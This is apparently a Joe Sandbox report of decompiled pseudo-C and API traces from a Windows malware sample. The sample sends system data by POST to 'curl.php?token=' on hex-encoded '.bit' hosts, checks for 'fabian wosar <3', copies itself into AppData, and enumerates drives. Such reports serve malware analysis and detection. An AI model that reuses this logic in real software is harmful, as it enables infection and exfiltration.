                                      control_flow_graph 326 405370-40538c call 4077f0 call 404eb0 330 405391-4053d1 lstrlenA VirtualAlloc * 2 326->330 331 4053d3-4053d8 330->331 332 4053da 330->332 331->332 333 4053dc-4054c6 lstrcatA * 2 lstrlenA call 408b30 lstrcpyW call 405270 lstrlenW lstrlenA call 407a00 331->333 332->333 340 4054f8-405525 VirtualFree * 3 333->340 341 4054c8-4054d1 333->341 342 405527-405528 InternetCloseHandle 340->342 343 40552e-405536 340->343 341->340 344 4054d3-4054e6 call 405050 341->344 342->343 347 4054f6 344->347 348 4054e8-4054ed 344->348 347->340 348->340 349 4054ef-4054f4 348->349 349->340
                                      C-Code - Quality: 35%
                                      			E00405370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
                                      				CHAR* _v12;
                                      				void* _v16;
                                      				CHAR** _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				void* _v32;
                                      				char _v36;
                                      				short _v136;
                                      				char _v1156;
                                      				short _v1160;
                                      				void* _t31;
                                      				int _t45;
                                      				void* _t53;
                                      				CHAR* _t57;
                                      				CHAR* _t59;
                                      				CHAR* _t60;
                                      				void* _t61;
                                      				void* _t70;
                                      				short _t71;
                                      
                                      				_t59 = __ecx;
                                      				_v20 = __edx;
                                      				_v12 = __ecx;
                                      				E004077F0( &_v36); // executed
                                      				_t31 = E00404EB0(); // executed
                                      				_v24 = _t31;
                                      				_t70 = 0x400 + lstrlenA(_t59) * 2;
                                      				_t7 = _t70 + 1; // 0x74cb6981
                                      				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                      				_v28 = _t60;
                                      				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                      				if(_t60 == 0) {
                                      					L2:
                                      					_t60 = 0;
                                      					L3:
                                      					lstrcatA(_t60, "data=");
                                      					lstrcatA(_t60, _v12);
                                      					asm("movdqu xmm0, [0x40ffd0]");
                                      					asm("movdqu [ebp-0x84], xmm0");
                                      					asm("movdqu xmm0, [0x40ffe0]");
                                      					asm("movdqu [ebp-0x74], xmm0");
                                      					asm("movdqu xmm0, [0x40fff0]");
                                      					asm("movdqu [ebp-0x64], xmm0");
                                      					asm("movdqu xmm0, [0x410000]");
                                      					asm("movdqu [ebp-0x54], xmm0");
                                      					asm("movdqu xmm0, [0x410010]");
                                      					asm("movdqu [ebp-0x44], xmm0");
                                      					asm("movdqu xmm0, [0x410020]");
                                      					asm("movdqu [ebp-0x34], xmm0");
                                      					lstrlenA(_t60);
                                      					_t71 = 0;
                                      					_v1160 = 0;
                                      					E00408B30( &_v1156, 0, 0x3fc);
                                      					lstrcpyW( &_v1160, L"curl.php?token=");
                                      					E00405270( &_v1160);
                                      					_t45 = lstrlenW( &_v136);
                                      					_t74 = _v16;
                                      					_push(_t45);
                                      					_push( &_v136);
                                      					_push(L"POST");
                                      					_push(0x31fff);
                                      					_push(_v16);
                                      					_push(lstrlenA(_t60));
                                      					_push(_t60);
                                      					_t61 = _v24;
                                      					_push( &_v1160);
                                      					_push(_t61);
                                      					if(E00407A00( &_v36) != 0) {
                                      						_t71 = 1;
                                      						if(_a4 != 0) {
                                      							_v12 = 0;
                                      							if(E00405050(_t74,  &_v12) == 0) {
                                      								_t71 = 0;
                                      							} else {
                                      								_t57 = _v12;
                                      								if(_t57 != 0) {
                                      									 *_v20 = _t57;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					VirtualFree(_t61, 0, 0x8000);
                                      					VirtualFree(_v16, 0, 0x8000);
                                      					VirtualFree(_v28, 0, 0x8000);
                                      					_t53 = _v32;
                                      					if(_t53 != 0) {
                                      						InternetCloseHandle(_t53);
                                      					}
                                      					return _t71;
                                      				}
                                      				_t10 = _t70 + 1; // 0x74cb6981
                                      				if(_t70 < _t10) {
                                      					goto L3;
                                      				}
                                      				goto L2;
                                      			}






















                                      0x0040537b
                                      0x0040537d
                                      0x00405384
                                      0x00405387
                                      0x0040538c
                                      0x00405392
                                      0x004053a8
                                      0x004053af
                                      0x004053c3
                                      0x004053c7
                                      0x004053cc
                                      0x004053d1
                                      0x004053da
                                      0x004053da
                                      0x004053dc
                                      0x004053e8
                                      0x004053ee
                                      0x004053f0
                                      0x004053f9
                                      0x00405401
                                      0x00405409
                                      0x0040540e
                                      0x00405416
                                      0x0040541b
                                      0x00405423
                                      0x00405428
                                      0x00405430
                                      0x00405435
                                      0x0040543d
                                      0x00405442
                                      0x00405448
                                      0x00405457
                                      0x0040545d
                                      0x00405471
                                      0x0040547d
                                      0x00405489
                                      0x0040548f
                                      0x00405492
                                      0x00405499
                                      0x0040549a
                                      0x004054a2
                                      0x004054a7
                                      0x004054af
                                      0x004054b0
                                      0x004054b1
                                      0x004054ba
                                      0x004054bb
                                      0x004054c6
                                      0x004054cc
                                      0x004054d1
                                      0x004054d6
                                      0x004054e6
                                      0x004054f6
                                      0x004054e8
                                      0x004054e8
                                      0x004054ed
                                      0x004054f2
                                      0x004054f2
                                      0x004054ed
                                      0x004054e6
                                      0x004054d1
                                      0x00405506
                                      0x00405512
                                      0x0040551e
                                      0x00405520
                                      0x00405525
                                      0x00405528
                                      0x00405528
                                      0x00405536
                                      0x00405536
                                      0x004053d3
                                      0x004053d8
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                        • Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
                                        • Part of subcall function 00404EB0: Sleep.KERNEL32(00002710), ref: 00404F4C
                                        • Part of subcall function 00404EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
                                        • Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
                                        • Part of subcall function 00404EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
                                        • Part of subcall function 00404EB0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404F8F
                                        • Part of subcall function 00404EB0: wsprintfW.USER32 ref: 00404FA7
                                        • Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8
                                      • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 00405395
                                      • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 004053B5
                                      • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 004053CA
                                      • lstrcatA.KERNEL32(00000000,data=), ref: 004053E8
                                      • lstrcatA.KERNEL32(00000000,004056FE), ref: 004053EE
                                      • lstrlenA.KERNEL32(00000000), ref: 00405442
                                      • _memset.LIBCMT ref: 0040545D
                                      • lstrcpyW.KERNEL32 ref: 00405471
                                      • lstrlenW.KERNEL32(?), ref: 00405489
                                      • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 004054A9
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00405506
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00405512
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0040551E
                                      • InternetCloseHandle.WININET(?), ref: 00405528
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                      • String ID: POST$curl.php?token=$data=
                                      • API String ID: 186108914-1715678351
                                      • Opcode ID: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
                                      • Instruction ID: 4aa36092560c0acaf7b062926e9d70cdf9a0aa4eca25d73af60562301bb62425
                                      • Opcode Fuzzy Hash: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
                                      • Instruction Fuzzy Hash: 54519671E0031A66DB109BA5DD45FEEBB7CFB48300F104176FA44B6191DB786A44CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 350 402ad0-402b00 VirtualAlloc 351 402b02-402b1a 350->351 352 402b1c-402b1e 350->352 353 402b20-402b4a GetModuleFileNameW GetTempPathW call 407ba0 351->353 352->353 356 402b53-402bae lstrlenW call 407c60 GetEnvironmentVariableW call 407ba0 353->356 357 402b4c-402b4e 353->357 365 402bb0-402bc4 356->365 366 402bd8-402bfd lstrcatW * 3 call 402890 356->366 358 402c40 call 402960 357->358 363 402c45-402c47 ExitThread 358->363 371 402bd3 365->371 372 402bc6-402bd1 365->372 368 402c02-402c07 366->368 368->363 370 402c09-402c1d 368->370 376 402c2c 370->376 377 402c1f-402c2a 370->377 373 402bd5-402bd6 371->373 372->371 372->373 374 402c2f-402c3d wsprintfW 373->374 374->358 378 402c2e 376->378 377->376 377->378 378->374
                                      C-Code - Quality: 93%
                                      			E00402AD0() {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				short _v20;
                                      				WCHAR* _v24;
                                      				WCHAR* _v28;
                                      				long _v32;
                                      				intOrPtr _v36;
                                      				WCHAR* _t24;
                                      				void* _t27;
                                      				WCHAR* _t33;
                                      				WCHAR* _t38;
                                      				signed int _t40;
                                      				signed int _t46;
                                      				WCHAR* _t50;
                                      				WCHAR* _t54;
                                      				void* _t56;
                                      				WCHAR* _t57;
                                      				void* _t58;
                                      				WCHAR* _t64;
                                      				WCHAR* _t65;
                                      				WCHAR* _t67;
                                      				signed int _t69;
                                      				void* _t71;
                                      				void* _t72;
                                      
                                      				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                      				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
                                      				_v24 = _t24;
                                      				_t64 = _t24;
                                      				_v32 = 0;
                                      				if(_t24 == 0) {
                                      					_t67 = 0;
                                      					_t50 = 0;
                                      					__eflags = 0;
                                      				} else {
                                      					_t3 =  &(_t24[0x101]); // 0x202
                                      					_t65 = _t3;
                                      					_v32 = 0x404;
                                      					_t50 = _t65;
                                      					_t67 = _t24;
                                      					_t64 =  &(_t65[0x101]);
                                      				}
                                      				_v28 = _t67;
                                      				GetModuleFileNameW(0, _t67, 0x100);
                                      				GetTempPathW(0x100, _t50);
                                      				_t6 =  &(_t50[1]); // 0x204
                                      				_t27 = E00407BA0(_t67, _t6);
                                      				_t75 = _t27;
                                      				if(_t27 == 0) {
                                      					_v20 = 0x520050;
                                      					_v8 = 0;
                                      					_push(0x52);
                                      					_v16 = 0x440049;
                                      					_v12 = 0x520055;
                                      					E00407C60( &_v20, lstrlenW( &_v20)); // executed
                                      					_t72 = _t71 + 4;
                                      					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                      					_t13 =  &(_t50[1]); // 0x2
                                      					_t54 = _t67;
                                      					_t33 = E00407BA0(_t54, _t13);
                                      					__eflags = _t33;
                                      					if(_t33 == 0) {
                                      						lstrcatW(_t50, L"\\Microsoft\\");
                                      						lstrcatW(_t50,  &_v20);
                                      						lstrcatW(_t50, L".exe");
                                      						_push(_t54);
                                      						_t38 = E00402890(_v28, _t50); // executed
                                      						_t72 = _t72 + 4;
                                      						__eflags = _t38;
                                      						if(_t38 == 0) {
                                      							goto L17;
                                      						}
                                      						_t40 = lstrlenW(_t50);
                                      						__eflags = _v28;
                                      						_t56 = 0xa + _t40 * 2;
                                      						if(_v28 == 0) {
                                      							L13:
                                      							_t64 = 0;
                                      							__eflags = 0;
                                      							L14:
                                      							_push(_t50);
                                      							L15:
                                      							wsprintfW(_t64, L"\"%s\"");
                                      							_t57 = _t64;
                                      							goto L16;
                                      						}
                                      						__eflags = _v36 + _t56 - 0x800;
                                      						if(__eflags < 0) {
                                      							goto L14;
                                      						}
                                      						goto L13;
                                      					}
                                      					_t46 = lstrlenW(_t67);
                                      					__eflags = _v28;
                                      					_t58 = 0xa + _t46 * 2;
                                      					if(_v28 == 0) {
                                      						L8:
                                      						_t64 = 0;
                                      						__eflags = 0;
                                      						L9:
                                      						_push(_t67);
                                      						goto L15;
                                      					}
                                      					__eflags = _v36 + _t58 - 0x800;
                                      					if(__eflags < 0) {
                                      						goto L9;
                                      					}
                                      					goto L8;
                                      				} else {
                                      					_t57 = _t67;
                                      					L16:
                                      					E00402960(_t57, _t75); // executed
                                      					L17:
                                      					ExitThread(0);
                                      				}
                                      			}




























                                      0x00402ad6
                                      0x00402aea
                                      0x00402af0
                                      0x00402af4
                                      0x00402af6
                                      0x00402b00
                                      0x00402b1c
                                      0x00402b1e
                                      0x00402b1e
                                      0x00402b02
                                      0x00402b02
                                      0x00402b02
                                      0x00402b08
                                      0x00402b10
                                      0x00402b12
                                      0x00402b14
                                      0x00402b14
                                      0x00402b28
                                      0x00402b2c
                                      0x00402b38
                                      0x00402b3e
                                      0x00402b43
                                      0x00402b48
                                      0x00402b4a
                                      0x00402b55
                                      0x00402b62
                                      0x00402b67
                                      0x00402b6c
                                      0x00402b75
                                      0x00402b89
                                      0x00402b8e
                                      0x00402b9c
                                      0x00402ba2
                                      0x00402ba5
                                      0x00402ba7
                                      0x00402bac
                                      0x00402bae
                                      0x00402be4
                                      0x00402bec
                                      0x00402bf4
                                      0x00402bf6
                                      0x00402bfd
                                      0x00402c02
                                      0x00402c05
                                      0x00402c07
                                      0x00000000
                                      0x00000000
                                      0x00402c0f
                                      0x00402c11
                                      0x00402c16
                                      0x00402c1d
                                      0x00402c2c
                                      0x00402c2c
                                      0x00402c2c
                                      0x00402c2e
                                      0x00402c2e
                                      0x00402c2f
                                      0x00402c35
                                      0x00402c3b
                                      0x00000000
                                      0x00402c3d
                                      0x00402c25
                                      0x00402c2a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402c2a
                                      0x00402bb6
                                      0x00402bb8
                                      0x00402bbd
                                      0x00402bc4
                                      0x00402bd3
                                      0x00402bd3
                                      0x00402bd3
                                      0x00402bd5
                                      0x00402bd5
                                      0x00000000
                                      0x00402bd5
                                      0x00402bcc
                                      0x00402bd1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402b4c
                                      0x00402b4c
                                      0x00402c40
                                      0x00402c40
                                      0x00402c45
                                      0x00402c47
                                      0x00402c47

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
                                      • GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
                                      • lstrlenW.KERNEL32(?,?,?,00000052), ref: 00402B7D
                                        • Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                        • Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                        • Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                        • Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                        • Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                        • Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                        • Part of subcall function 00407C60: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407D73
                                      • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00402B9C
                                      • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00402BE4
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00402BEC
                                      • lstrcatW.KERNEL32(00000000,.exe), ref: 00402BF4
                                      • wsprintfW.USER32 ref: 00402C35
                                      • ExitThread.KERNEL32 ref: 00402C47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                      • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                      • API String ID: 139215849-2398311915
                                      • Opcode ID: 9e747ac548fade67ca80e3a5a1c7d914f0df0461fe01838a22cb7d582e208898
                                      • Instruction ID: 1f7025583fece4150ab6efb2fb4095bab450847bdb3333ccf3c22af7b910d208
                                      • Opcode Fuzzy Hash: 9e747ac548fade67ca80e3a5a1c7d914f0df0461fe01838a22cb7d582e208898
                                      • Instruction Fuzzy Hash: 0841A771204311ABE304EF219E4DB5F77A8AF84704F04443EB555B62D2DBB8A908CBAF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 393 407369 394 407370-407388 GetDriveTypeW 393->394 395 40747b 394->395 396 40738e-407391 394->396 397 407481-40748b 395->397 396->395 398 407397-4073de lstrcatW * 3 GetDiskFreeSpaceW 396->398 397->394 399 407491-4074a7 lstrlenW 397->399 400 407471-407479 lstrcatW 398->400 401 4073e4-40746f call 408470 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 398->401 404 4074a9-4074c5 VirtualAlloc 399->404 405 4074ee-4074f9 399->405 400->395 401->397 407 4074e4 404->407 408 4074c7-4074d0 call 4068f0 404->408 407->405 408->405 413 4074d2-4074de VirtualFree 408->413 413->407
                                      C-Code - Quality: 90%
                                      			E00407369(signed int __eax, intOrPtr __edx, void* __esi) {
                                      				signed int _t51;
                                      				signed int _t54;
                                      				signed int _t56;
                                      				void* _t58;
                                      				long _t59;
                                      				int _t72;
                                      				void* _t75;
                                      				signed int _t77;
                                      				signed int _t80;
                                      				intOrPtr _t85;
                                      				WCHAR* _t88;
                                      				intOrPtr _t93;
                                      				signed int _t95;
                                      				intOrPtr _t100;
                                      				void* _t102;
                                      				void* _t104;
                                      				void* _t106;
                                      
                                      				_t102 = __esi;
                                      				_t93 = __edx;
                                      				_t51 = __eax;
                                      				do {
                                      					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
                                      					_t54 = GetDriveTypeW(_t104 - 0x24); // executed
                                      					_t95 = _t54;
                                      					if(_t95 <= 2 || _t95 == 5) {
                                      						L6:
                                      					} else {
                                      						 *((short*)(_t104 - 0x20)) = 0;
                                      						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
                                      						 *((short*)(_t104 - 0x20)) = 0x5c;
                                      						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
                                      						lstrcatW( *(_t102 + 0x7c), "_");
                                      						_t72 = GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10); // executed
                                      						if(_t72 == 0) {
                                      							lstrcatW( *(_t102 + 0x7c), L"0,");
                                      							goto L6;
                                      						} else {
                                      							 *((intOrPtr*)(_t104 - 8)) = E00408470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
                                      							_t85 = _t93;
                                      							_t75 = E00408470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
                                      							_t100 =  *((intOrPtr*)(_t104 - 8));
                                      							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
                                      							asm("sbb eax, edx");
                                      							 *((intOrPtr*)(_t104 - 8)) = _t85;
                                      							_t77 = lstrlenW( *(_t102 + 0x7c));
                                      							_push(_t85);
                                      							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
                                      							_t80 = lstrlenW( *(_t102 + 0x7c));
                                      							_push( *((intOrPtr*)(_t104 - 8)));
                                      							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
                                      							_t106 = _t106 + 0x20;
                                      							lstrcatW( *(_t102 + 0x7c), ",");
                                      						}
                                      					}
                                      					_t51 =  *(_t104 - 0x18) + 1;
                                      					 *(_t104 - 0x18) = _t51;
                                      				} while (_t51 < 0x1b);
                                      				_t56 = lstrlenW( *(_t102 + 0x7c));
                                      				_t88 =  *(_t102 + 0x7c);
                                      				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
                                      				if( *(_t102 + 0x80) != 0) {
                                      					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
                                      					 *(_t102 + 0x84) = _t58;
                                      					if(_t58 == 0) {
                                      						L13:
                                      						 *(_t102 + 0x80) = 0;
                                      					} else {
                                      						_push(_t88);
                                      						_t59 = E004068F0(_t58); // executed
                                      						if(_t59 == 0) {
                                      							VirtualFree( *(_t102 + 0x84), _t59, 0x8000); // executed
                                      							goto L13;
                                      						}
                                      					}
                                      				}
                                      				return 1;
                                      			}




















                                      0x00407369
                                      0x00407369
                                      0x00407369
                                      0x00407370
                                      0x00407375
                                      0x0040737d
                                      0x00407383
                                      0x00407388
                                      0x0040747b
                                      0x00407397
                                      0x00407399
                                      0x004073a4
                                      0x004073b2
                                      0x004073b6
                                      0x004073c0
                                      0x004073d6
                                      0x004073de
                                      0x00407479
                                      0x00000000
                                      0x004073e4
                                      0x00407400
                                      0x00407403
                                      0x00407405
                                      0x0040740a
                                      0x00407416
                                      0x00407419
                                      0x0040741b
                                      0x0040741e
                                      0x00407427
                                      0x00407438
                                      0x00407446
                                      0x00407448
                                      0x0040745a
                                      0x00407462
                                      0x0040746d
                                      0x0040746d
                                      0x004073de
                                      0x00407484
                                      0x00407485
                                      0x00407488
                                      0x00407494
                                      0x00407496
                                      0x0040749b
                                      0x004074a7
                                      0x004074b7
                                      0x004074bd
                                      0x004074c5
                                      0x004074e4
                                      0x004074e4
                                      0x004074c7
                                      0x004074c7
                                      0x004074c9
                                      0x004074d0
                                      0x004074de
                                      0x00000000
                                      0x004074de
                                      0x004074d0
                                      0x004074c5
                                      0x004074f9

                                      APIs
                                      • GetDriveTypeW.KERNEL32(?), ref: 0040737D
                                      • lstrcatW.KERNEL32(?,?), ref: 004073A4
                                      • lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
                                      • lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00404590,00000000,?,00000000), ref: 0040741E
                                      • wsprintfW.USER32 ref: 00407438
                                      • lstrlenW.KERNEL32(?), ref: 00407446
                                      • wsprintfW.USER32 ref: 0040745A
                                      • lstrcatW.KERNEL32(?,004107D0), ref: 0040746D
                                      • lstrcatW.KERNEL32(?,004107D4), ref: 00407479
                                      • lstrlenW.KERNEL32(?), ref: 00407494
                                      • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 004074B7
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 004074DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
                                      • String ID: %I64u$%I64u/
                                      • API String ID: 1496313530-2450085969
                                      • Opcode ID: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
                                      • Instruction ID: f56a49131db2d010194e37aaef5b9fe43e36d368a28beff8943d66c84b1e197f
                                      • Opcode Fuzzy Hash: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
                                      • Instruction Fuzzy Hash: A4418371A00608AFDB219BA4CD45FAEBBF9FF48300F10442AE655F32A1DA35F950CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 414 404eb0-404f28 VirtualAlloc 415 404fc0-404fc6 414->415 416 404f2e-404f30 414->416 417 404f32-404f45 416->417 418 404f52-404f86 lstrlenW VirtualAlloc call 404d60 lstrcmpiA 417->418 419 404f47-404f4c Sleep 417->419 422 404fa0-404fbe wsprintfW VirtualFree 418->422 423 404f88-404f9e VirtualFree 418->423 419->418 422->415 423->417
                                      C-Code - Quality: 93%
                                      			E00404EB0() {
                                      				intOrPtr _v8;
                                      				char* _v12;
                                      				char* _v16;
                                      				char* _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v72;
                                      				WCHAR* _t26;
                                      				void* _t31;
                                      				long _t33;
                                      				WCHAR* _t38;
                                      				signed int _t40;
                                      				signed int _t41;
                                      				void* _t46;
                                      				signed int _t50;
                                      				void* _t52;
                                      
                                      				asm("movdqa xmm0, [0x410960]");
                                      				_v20 =  &_v72;
                                      				_v16 =  &_v36;
                                      				_v36 = 0x69736d65;
                                      				_v32 = 0x74666f73;
                                      				_v28 = 0x7469622e;
                                      				_v24 = 0;
                                      				asm("movdqu [ebp-0x44], xmm0");
                                      				_v56 = 0;
                                      				_v52 = 0x646e6167;
                                      				_v48 = 0x62617263;
                                      				_v44 = 0x7469622e;
                                      				_v40 = 0;
                                      				_v12 =  &_v52;
                                      				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4); // executed
                                      				_t38 = _t26;
                                      				if(_t38 != 0) {
                                      					_t40 = 0;
                                      					_t50 = 0;
                                      					while(1) {
                                      						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
                                      						_t50 =  ==  ? 0 : _t50 + 1;
                                      						if(_t40 == 0xffffffff) {
                                      							Sleep(0x2710); // executed
                                      						}
                                      						_t31 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4); // executed
                                      						_t46 = _t31;
                                      						_t41 = _t46; // executed
                                      						E00404D60(_t41, _v8); // executed
                                      						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
                                      						if(_t33 != 0) {
                                      							break;
                                      						}
                                      						VirtualFree(_t46, _t33, 0x8000); // executed
                                      						_t40 = _t41 | 0xffffffff;
                                      					}
                                      					wsprintfW(_t38, L"%S", _t46);
                                      					VirtualFree(_t46, 0, 0x8000);
                                      					_t26 = _t38;
                                      				}
                                      				return _t26;
                                      			}


























                                      0x00404eb6
                                      0x00404ecc
                                      0x00404ed7
                                      0x00404ee4
                                      0x00404eeb
                                      0x00404ef2
                                      0x00404ef9
                                      0x00404efd
                                      0x00404f02
                                      0x00404f06
                                      0x00404f0d
                                      0x00404f14
                                      0x00404f1b
                                      0x00404f1f
                                      0x00404f22
                                      0x00404f24
                                      0x00404f28
                                      0x00404f2e
                                      0x00404f30
                                      0x00404f32
                                      0x00404f37
                                      0x00404f3f
                                      0x00404f45
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f6a
                                      0x00404f6f
                                      0x00404f71
                                      0x00404f73
                                      0x00404f7e
                                      0x00404f86
                                      0x00000000
                                      0x00000000
                                      0x00404f8f
                                      0x00404f9b
                                      0x00404f9b
                                      0x00404fa7
                                      0x00404fb8
                                      0x00404fbe
                                      0x00404fbe
                                      0x00404fc6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
                                      • Sleep.KERNEL32(00002710), ref: 00404F4C
                                      • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
                                      • VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
                                      • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
